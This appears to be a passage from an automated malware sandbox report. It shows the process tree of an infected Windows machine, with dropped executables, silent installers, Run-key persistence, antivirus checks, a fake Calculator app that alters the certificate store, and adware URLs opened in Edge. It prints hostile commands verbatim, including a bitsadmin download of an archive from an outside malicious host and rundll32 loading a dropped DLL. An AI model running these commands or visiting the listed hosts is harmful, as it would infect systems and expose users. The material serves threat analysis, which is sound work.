C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp"C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp" /SL5="$4017C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe"C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe" /VERYSILENT5⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe"C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe"5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e66⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:37⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad6⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514836⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515136⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872156⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631196⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942316⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵
-
C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe"C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654" & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exeC:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exeC:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S7⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z8⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe"C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4151360.exe"C:\Users\Admin\AppData\Roaming\4151360.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6948140.exe"C:\Users\Admin\AppData\Roaming\6948140.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7968681.exe"C:\Users\Admin\AppData\Roaming\7968681.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2794099.exe"C:\Users\Admin\AppData\Roaming\2794099.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\294455.exe"C:\Users\Admin\AppData\Roaming\294455.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8882655.exe"C:\Users\Admin\AppData\Roaming\8882655.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe"C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e906⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=1752 /prefetch:85⤵
- Loads dropped DLL
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2620 /prefetch:15⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=2412 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2628 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:25⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3328 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3272 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3812 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3652 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=2728 /prefetch:85⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe cc6c8b923930ed971de306e7d61c01b5 daOiKgVPfUaRwyNH+IbtQg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2444 -ip 24441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4388 -ip 43881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1416 -ip 14161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2696 -ip 26961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3480 -ip 34801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3696 -ip 36961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5412 -ip 54121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\D93A.exeC:\Users\Admin\AppData\Local\Temp\D93A.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D93A.exeC:\Users\Admin\AppData\Local\Temp\D93A.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\1E33.exeC:\Users\Admin\AppData\Local\Temp\1E33.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 768 -ip 7681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\345C.exeC:\Users\Admin\AppData\Local\Temp\345C.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3440 -ip 34401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\3CD9.exeC:\Users\Admin\AppData\Local\Temp\3CD9.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\AF99.exeC:\Users\Admin\AppData\Local\Temp\AF99.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
